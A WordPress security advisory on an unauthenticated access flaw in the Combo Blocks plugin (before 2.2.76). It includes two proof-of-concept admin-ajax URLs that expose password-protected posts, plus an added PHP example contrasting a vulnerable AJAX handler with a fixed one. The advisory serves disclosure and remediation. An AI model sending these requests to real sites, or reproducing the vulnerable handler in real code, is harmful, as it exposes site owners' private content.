wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID: E460E926-6E9B-4E9F-B908-BA5C9C7FB290
History: Mar 19, 2024 - 12:00 a.m.

Combo Blocks < 2.2.76 - Unauthenticated Password Protected Posts Access

Published: 2024-03-19 00:00:00
Author: Krzysztof Zając (CERT PL)
Source: wpscan.com
Tags: combo blocks, unauthenticated access, password protection, ajax, vulnerability

AI Score

6.7

Confidence

High

EPSS

0.001

Percentile

21.4%

Description

The plugin does not prevent password-protected posts from being included in the results of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts.

PoC

Open one of the URLs below as an unauthenticated user and note that password-protected posts are disclosed in the response (when the blog has such posts):

https://example.com/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free
https://example.com/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free
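The root cause of this bug class, as an added illustration that is not the Combo Blocks plugin's code (the advisory does not reproduce it): WordPress returns password-protected posts from WP_Query like any other published post, and a handler registered on a wp_ajax_nopriv_* hook that renders the query results straight from post_content never passes through the password gate that the normal loop applies. The hook name, function names and query arguments below are hypothetical stand-ins for a generic "paginate / search via admin-ajax.php" action; the WordPress APIs used (WP_Query's has_password argument, post_password_required(), wp_send_json_success()) are real.

```php
<?php
/*
 * Added example, not the Combo Blocks plugin's code. The action name
 * "example_grid_search" and both function names are hypothetical.
 */

// VULNERABLE: protected posts come back from WP_Query alongside public ones,
// and post_content is rendered without checking whether this visitor has
// unlocked the post, so an anonymous GET to
// /wp-admin/admin-ajax.php?action=example_grid_search receives the gated body.
function example_grid_search_vulnerable() {
    $keyword = isset( $_GET['keyword'] ) ? sanitize_text_field( wp_unslash( $_GET['keyword'] ) ) : '';

    $query = new WP_Query( array(
        'post_type'      => 'post',
        'post_status'    => 'publish',
        's'              => $keyword,
        'posts_per_page' => 10,
    ) );

    $out = array();
    foreach ( $query->posts as $post ) {
        $out[] = array(
            'id'      => $post->ID,
            'title'   => $post->post_title,
            // Applying the_content directly bypasses the password form that
            // get_the_content() would substitute inside the loop.
            'content' => apply_filters( 'the_content', $post->post_content ),
        );
    }
    wp_send_json_success( $out );
}

// FIXED: exclude protected posts at query time and, defensively, refuse to
// render any post whose password gate this visitor has not passed.
function example_grid_search_fixed() {
    $keyword = isset( $_GET['keyword'] ) ? sanitize_text_field( wp_unslash( $_GET['keyword'] ) ) : '';

    $query = new WP_Query( array(
        'post_type'      => 'post',
        'post_status'    => 'publish',
        's'              => $keyword,
        'posts_per_page' => 10,
        // WP_Query argument (WordPress 3.9+): only posts with an empty post_password.
        'has_password'   => false,
    ) );

    $out = array();
    foreach ( $query->posts as $post ) {
        // Second line of defence: post_password_required() checks the visitor's
        // wp-postpass_* cookie, so a protected post is emitted only after the
        // password form has actually been satisfied.
        if ( post_password_required( $post ) ) {
            continue;
        }
        $out[] = array(
            'id'      => $post->ID,
            'title'   => $post->post_title,
            'content' => apply_filters( 'the_content', $post->post_content ),
        );
    }
    wp_send_json_success( $out );
}

// The *_nopriv_* registration is what makes the action reachable without a
// session; both hooks are registered so logged-in users get the same handler.
add_action( 'wp_ajax_example_grid_search',        'example_grid_search_fixed' );
add_action( 'wp_ajax_nopriv_example_grid_search', 'example_grid_search_fixed' );
```

Filtering at query time matters even for endpoints that return only titles or excerpts: the s argument matches against post_content, so a paginated or searchable listing that merely includes a protected post in its hit list lets an unauthenticated caller test, term by term, what the protected body contains. The has_password => false argument closes that side channel as well as the direct disclosure.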

